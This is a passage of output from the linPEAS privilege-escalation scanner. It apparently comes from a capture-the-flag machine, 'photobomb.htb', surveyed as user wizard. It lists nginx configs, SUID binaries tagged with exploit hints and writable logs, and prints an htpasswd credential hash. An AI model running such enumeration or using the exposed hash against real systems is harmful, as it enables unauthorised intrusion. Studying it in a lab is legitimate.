uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Login now
 20:01:09 up 51 min,  0 users,  load average: 0.18, 0.15, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
wizard   pts/0        Wed Mar 16 22:03:22 2022 - Wed Mar 16 22:09:27 2022  (00:06)     10.11.12.40
reboot   system boot  Wed Mar 16 22:03:08 2022 - Wed Mar 16 22:10:19 2022  (00:07)     0.0.0.0
wizard   pts/0        Wed Mar 16 22:01:05 2022 - Wed Mar 16 22:02:59 2022  (00:01)     10.11.12.40
wizard   pts/0        Wed Mar 16 21:56:46 2022 - Wed Mar 16 22:00:59 2022  (00:04)     10.11.12.40
wizard   pts/0        Wed Mar 16 21:43:42 2022 - Wed Mar 16 21:56:40 2022  (00:12)     10.11.12.40
reboot   system boot  Wed Mar 16 21:42:40 2022 - Wed Mar 16 22:02:59 2022  (00:20)     0.0.0.0
wizard   pts/0        Wed Mar 16 21:33:45 2022 - Wed Mar 16 21:42:30 2022  (00:08)     10.11.12.40
reboot   system boot  Wed Mar 16 21:31:26 2022 - Wed Mar 16 21:42:30 2022  (00:11)     0.0.0.0

wtmp begins Wed Mar 16 21:31:26 2022

╔══════════╣ Last time logon each user
Username         Port     From             Latest
root             tty1                      Fri Sep 16 15:03:01 +0000 2022
wizard           pts/0    10.10.14.23      Mon Oct  3 22:39:03 +0000 2022

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/ruby
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers

╔══════════╣ Searching mysql credentials and exec

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found
httpd Not Found
Nginx version: 
══╣ Nginx modules
ngx_http_image_filter_module.so
ngx_http_xslt_filter_module.so
ngx_mail_module.so
ngx_stream_module.so
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Sep 16 15:14 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Sep 16 15:14 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 45 Mar 16  2022 /etc/nginx/sites-enabled/photobomb.htb.conf -> /etc/nginx/sites-available/photobomb.htb.conf
server {
    listen       80;
    server_name  photobomb.htb;
    location / {
      proxy_pass http://127.0.0.1:4567;
    }
    location /printer {
      auth_basic           "Admin Area";
      auth_basic_user_file /home/wizard/photobomb/.htpasswd; 
      proxy_pass http://127.0.0.1:4567;
    }
}
lrwxrwxrwx 1 root root 34 Mar 16  2022 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
	listen 80 default_server;
	listen [::]:80 default_server;
	root /var/www/html;
	index index.html index.htm index.nginx-debian.html;
	server_name _;
	if ($remote_addr != photobomb.htb) {
		rewrite ^ http://photobomb.htb/;
	}
	location / {
		try_files $uri $uri/ =404;
	}
}




-rw-r--r-- 1 root root 1490 Feb  4  2019 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
	worker_connections 768;
}
http {
	sendfile on;
	tcp_nopush on;
	tcp_nodelay on;
	keepalive_timeout 65;
	types_hash_max_size 2048;
	include /etc/nginx/mime.types;
	default_type application/octet-stream;
	ssl_prefer_server_ciphers on;
	access_log /var/log/nginx/access.log;
	error_log /var/log/nginx/error.log;
	gzip on;
	include /etc/nginx/conf.d/*.conf;
	include /etc/nginx/sites-enabled/*;
}

-rw-r--r-- 1 root root 389 Feb  4  2019 /etc/default/nginx

-rwxr-xr-x 1 root root 4579 Feb  4  2019 /etc/init.d/nginx

-rw-r--r-- 1 root root 329 Feb  4  2019 /etc/logrotate.d/nginx

drwxr-xr-x 8 root root 4096 Sep 16 15:14 /etc/nginx
lrwxrwxrwx 1 root root 45 Mar 16  2022 /etc/nginx/sites-enabled/photobomb.htb.conf -> /etc/nginx/sites-available/photobomb.htb.conf
server {
    listen       80;
    server_name  photobomb.htb;
    location / {
      proxy_pass http://127.0.0.1:4567;
    }
    location /printer {
      auth_basic           "Admin Area";
      auth_basic_user_file /home/wizard/photobomb/.htpasswd; 
      proxy_pass http://127.0.0.1:4567;
    }
}
-rw-r--r-- 1 root root 423 Feb  4  2019 /etc/nginx/snippets/fastcgi-php.conf
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
try_files $fastcgi_script_name =404;
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
fastcgi_index index.php;
include fastcgi.conf;
-rw-r--r-- 1 root root 217 Feb  4  2019 /etc/nginx/snippets/snakeoil.conf
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
-rw-r--r-- 1 root root 302 Mar 23  2022 /etc/nginx/sites-available/photobomb.htb.conf
server {
    listen       80;
    server_name  photobomb.htb;
    location / {
      proxy_pass http://127.0.0.1:4567;
    }
    location /printer {
      auth_basic           "Admin Area";
      auth_basic_user_file /home/wizard/photobomb/.htpasswd; 
      proxy_pass http://127.0.0.1:4567;
    }
}
lrwxrwxrwx 1 root root 61 Mar 16  2022 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;
lrwxrwxrwx 1 root root 50 Mar 16  2022 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
lrwxrwxrwx 1 root root 48 Mar 16  2022 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;
lrwxrwxrwx 1 root root 60 Mar 16  2022 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
-rw-r--r-- 1 root root 1490 Feb  4  2019 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
	worker_connections 768;
}
http {
	sendfile on;
	tcp_nopush on;
	tcp_nodelay on;
	keepalive_timeout 65;
	types_hash_max_size 2048;
	include /etc/nginx/mime.types;
	default_type application/octet-stream;
	ssl_prefer_server_ciphers on;
	access_log /var/log/nginx/access.log;
	error_log /var/log/nginx/error.log;
	gzip on;
	include /etc/nginx/conf.d/*.conf;
	include /etc/nginx/sites-enabled/*;
}
-rw-r--r-- 1 root root 1077 Feb  4  2019 /etc/nginx/fastcgi.conf
fastcgi_param  SCRIPT_FILENAME    $document_root$fastcgi_script_name;
fastcgi_param  QUERY_STRING       $query_string;
fastcgi_param  REQUEST_METHOD     $request_method;
fastcgi_param  CONTENT_TYPE       $content_type;
fastcgi_param  CONTENT_LENGTH     $content_length;
fastcgi_param  SCRIPT_NAME        $fastcgi_script_name;
fastcgi_param  REQUEST_URI        $request_uri;
fastcgi_param  DOCUMENT_URI       $document_uri;
fastcgi_param  DOCUMENT_ROOT      $document_root;
fastcgi_param  SERVER_PROTOCOL    $server_protocol;
fastcgi_param  REQUEST_SCHEME     $scheme;
fastcgi_param  HTTPS              $https if_not_empty;
fastcgi_param  GATEWAY_INTERFACE  CGI/1.1;
fastcgi_param  SERVER_SOFTWARE    nginx/$nginx_version;
fastcgi_param  REMOTE_ADDR        $remote_addr;
fastcgi_param  REMOTE_PORT        $remote_port;
fastcgi_param  SERVER_ADDR        $server_addr;
fastcgi_param  SERVER_PORT        $server_port;
fastcgi_param  SERVER_NAME        $server_name;
fastcgi_param  REDIRECT_STATUS    200;

-rw-r--r-- 1 root root 374 Feb  4  2019 /etc/ufw/applications.d/nginx

drwxr-xr-x 3 root root 4096 Sep 16 15:14 /usr/lib/nginx

-rwxr-xr-x 1 root root 1195152 Apr 12  2022 /usr/sbin/nginx

drwxr-xr-x 2 root root 4096 Sep 16 15:14 /usr/share/doc/nginx

drwxr-xr-x 4 root root 4096 Sep 16 15:14 /usr/share/nginx
-rw-r--r-- 1 root root 53 Apr 12  2022 /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;
-rw-r--r-- 1 root root 52 Apr 12  2022 /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
-rw-r--r-- 1 root root 42 Apr 12  2022 /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
-rw-r--r-- 1 root root 40 Apr 12  2022 /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;

drwxr-xr-x 7 root root 4096 Sep 16 15:14 /var/lib/nginx

drwxr-xr-x 2 root adm 4096 Oct  3 22:29 /var/log/nginx


╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1007 Feb  4  2019 /etc/nginx/fastcgi_params

╔══════════╣ Analyzing Htpasswd Files (limit 70)
-rw-rw-r-- 1 wizard wizard 44 Sep 14 09:29 /home/wizard/photobomb/.htpasswd
pH0t0:$apr1$dnyF00ZD$9PifZwUxL/J0BCS/wTShU1

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Aug 16 18:48 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Sep 16 15:14 /etc/ldap


╔══════════╣ Searching ssl/ssh files
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes

══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml

══╣ Some certificates were found (out limited):
/etc/pki/fwupd/LVFS-CA.pem
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/var/lib/fwupd/pki/client.pem
58490PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/home/wizard/.gnupg/S.gpg-agent.browser
/home/wizard/.gnupg/S.gpg-agent.extra
/home/wizard/.gnupg/S.gpg-agent
/home/wizard/.gnupg/S.gpg-agent.ssh
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem	sftp	/usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Oct  3 22:31 /etc/pam.d
-rw-r--r-- 1 root root 2133 Dec  2  2021 /etc/pam.d/sshd




╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 3.0a


/tmp/tmux-1000
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Sep 16 14:53 /usr/share/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /home/wizard/photobomb/.htpasswd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 2796 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw------- 1 wizard wizard 1200 Mar 26  2022 /home/wizard/.gnupg/trustdb.gpg
-rw-r--r-- 1 root root 3267 Jul  4 16:20 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2247 Nov 10  2021 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Jul 16  2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Jul 13  2021 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Jul 13  2021 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Jul 16  2021 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Apr 21  2022 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Oct  5  2021 /usr/share/keyrings/ubuntu-advantage-ros.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13  2020 /usr/share/popularity-contest/debian-popcon.gpg

drwx------ 3 wizard wizard 4096 Oct 25 20:01 /home/wizard/.gnupg


╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 813 Feb  2  2020 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind



╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 www-data adm 394240 Oct 25 20:01 /var/log/nginx/access.log

-rw-r----- 1 www-data adm 1284 Oct 25 20:01 /var/log/nginx/error.log

╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc
-rw-r--r-- 1 wizard wizard 3771 Feb 25  2020 /home/wizard/.bashrc
-r--r--r-- 1 root root 2500 Sep 15 12:19 /opt/.bashrc





-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 wizard wizard 807 Feb 25  2020 /home/wizard/.profile






                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 87K Mar 14  2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 84K Mar 14  2022 /usr/bin[1;31m/chfn  --->  SuSE_9.3/10[0m
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin[1;31m/sudo  --->  check_if_the_sudo_version_is_vulnerable[0m
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin[1;31m/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)[0m
-rwsr-xr-x 1 root root 67K Feb  7  2022 /usr/bin/su
-rwsr-xr-x 1 root root 67K Mar 14  2022 /usr/bin[1;31m/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
-rwsr-xr-x 1 root root 55K Feb  7  2022 /usr/bin[1;31m/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
-rwsr-xr-x 1 root root 52K Mar 14  2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 44K Mar 14  2022 /usr/bin[1;31m/newgrp  --->  HP-UX_10.20[0m
-rwsr-xr-x 1 root root 39K Feb  7  2022 /usr/bin[1;31m/umount  --->  BSD/Linux(08-1996)[0m
-rwsr-xr-x 1 root root 23K Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 463K Mar 30  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Apr 29 12:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 31K Mar 14  2022 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin[1;31m/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)[0m
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 83K Mar 14  2022 /usr/bin/chage
-rwxr-sr-x 1 root tty 35K Feb  7  2022 /usr/bin/wall
-rwxr-sr-x 1 root ssh 343K Mar 30  2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
/usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000

Parent Shell capabilities:
0x0000000000000000=

Files with capabilities (limited to 50):
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3461 Jun 21 10:44 sbin.dhclient
-rw-r--r-- 1 root root 3202 Feb 25  2020 usr.bin.man
-rw-r--r-- 1 root root 1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1385 Dec  7  2019 usr.sbin.tcpdump

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2022-09-15+12:11:38.1401919070 /opt/cleanup.sh
2022-09-14+09:29:18.6846822170 /home/wizard/photobomb/photobomb.sh

╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x  2 root root 4096 Sep 16 15:14 .
drwxr-xr-x 18 root root 4096 Sep 16 15:14 ..
-r--r--r--  1 root root 2500 Sep 15 12:19 .bashrc
-r-xr-xr-x  1 root root  340 Sep 15 12:11 cleanup.sh

╔══════════╣ Unexpected in root

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 32
drwxr-xr-x   2 root root 4096 Sep 16 15:14 .
drwxr-xr-x 104 root root 4096 Oct  3 22:31 ..
-rw-r--r--   1 root root   96 Dec  5  2019 01-locale-fix.sh
-rw-r--r--   1 root root  729 Feb  2  2020 bash_completion.sh
-rw-r--r--   1 root root 1003 Aug 13  2019 cedilla-portuguese.sh
-rw-r--r--   1 root root 1107 Nov  3  2019 gawk.csh
-rw-r--r--   1 root root  757 Nov  3  2019 gawk.sh
-rw-r--r--   1 root root 1557 Feb 17  2020 Z97-byobu.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/wizard/photobomb/source_images/voicu-apostol-MWER49YaD-M-unsplash.jpg
/home/wizard/photobomb/source_images/masaaki-komori-NYFaNoiPf7A-unsplash.jpg
/home/wizard/photobomb/source_images/andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg
/home/wizard/photobomb/source_images/tabitha-turner-8hg0xRg5QIs-unsplash.jpg
/home/wizard/photobomb/source_images/nathaniel-worrell-zK_az6W3xIo-unsplash.jpg
/home/wizard/photobomb/source_images/kevin-charit-XZoaTJTnB9U-unsplash.jpg
/home/wizard/photobomb/source_images/calvin-craig-T3M72YMf2oc-unsplash.jpg
/home/wizard/photobomb/source_images/eleanor-brooke-w-TLY0Ym4rM-unsplash.jpg
/home/wizard/photobomb/source_images/finn-whelen-DTfhsDIWNSg-unsplash.jpg
/home/wizard/photobomb/source_images/almas-salakhov-VK7TCqcZTlw-unsplash.jpg
/home/wizard/photobomb/source_images/mark-mc-neill-4xWHIpY2QcY-unsplash.jpg
/home/wizard/photobomb/source_images/wolfgang-hasselmann-RLEgmd1O7gs-unsplash.jpg
/home/wizard/user.txt
/root/
/var/www
/var/www/html
/var/www/html/index.nginx-debian.html

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/wizard
/home/wizard/photobomb/source_images

╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root wizard 33 Oct 25 19:10 /home/wizard/user.txt

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/lp
/var/log/btmp
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/syslog
/var/log/auth.log
/var/log/journal/718d9418a99645298bf97b770e8a876f/system.journal
/var/log/journal/718d9418a99645298bf97b770e8a876f/user-1000.journal
/home/wizard/photobomb/log/photobomb.log

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes
Writable: /home/wizard/photobomb/log/photobomb.log.old
Writable: /home/wizard/photobomb/log/photobomb.log

╔══════════╣ Files inside /home/wizard (limit 20)
total 44
drwxr-xr-x 7 wizard wizard 4096 Sep 16 15:14 .
drwxr-xr-x 3 root   root   4096 Sep 16 15:14 ..
lrwxrwxrwx 1 wizard wizard    9 Mar 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 wizard wizard  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 wizard wizard 3771 Feb 25  2020 .bashrc
drwx------ 2 wizard wizard 4096 Sep 16 15:14 .cache
drwxrwxr-x 4 wizard wizard 4096 Sep 16 15:14 .gem
drwx------ 3 wizard wizard 4096 Oct 25 20:01 .gnupg
drwxrwxr-x 3 wizard wizard 4096 Sep 16 15:14 .local
drwxrwxr-x 6 wizard wizard 4096 Sep 16 15:14 photobomb
-rw-r--r-- 1 wizard wizard  807 Feb 25  2020 .profile
-rw-r----- 1 root   wizard   33 Oct 25 19:10 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/index.nginx-debian.html

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup files (limited 100)
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-126/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 237957 Aug 26 09:39 /usr/src/linux-headers-5.4.0-126-generic/.config.old
-rw-r--r-- 1 root root 0 Aug 26 09:39 /usr/src/linux-headers-5.4.0-126-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Aug 26 09:39 /usr/src/linux-headers-5.4.0-126-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 11886 Sep 16 14:56 /usr/share/info/dir.old
-rw-r--r-- 1 root root 1413 Oct  3 22:31 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 1802 Feb 15  2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 44048 Aug 16 13:23 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 9833 Aug 26 09:39 /usr/lib/modules/5.4.0-126-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Aug 26 09:39 /usr/lib/modules/5.4.0-126-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 2743 Feb 23  2022 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 wizard wizard 553 Oct 25 19:50 /home/wizard/photobomb/log/photobomb.log.old

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001

 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)

╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x  3 root root 4.0K Mar 16  2022 .
drwxr-xr-x 13 root root 4.0K Sep 16 11:58 ..
drwxr-xr-x  2 root root 4.0K Mar 16  2022 html

/var/www/html:
total 12K
drwxr-xr-x 2 root root 4.0K Mar 16  2022 .
drwxr-xr-x 3 root root 4.0K Mar 16  2022 ..

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 landscape landscape 0 Feb 23  2022 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout
-rw------- 1 root root 0 Feb 23  2022 /etc/.pwd.lock
-rw-r--r-- 1 wizard wizard 220 Feb 25  2020 /home/wizard/.bash_logout
-rw-r--r-- 1 root root 0 Oct 25 19:09 /run/network/.ifstate.lock

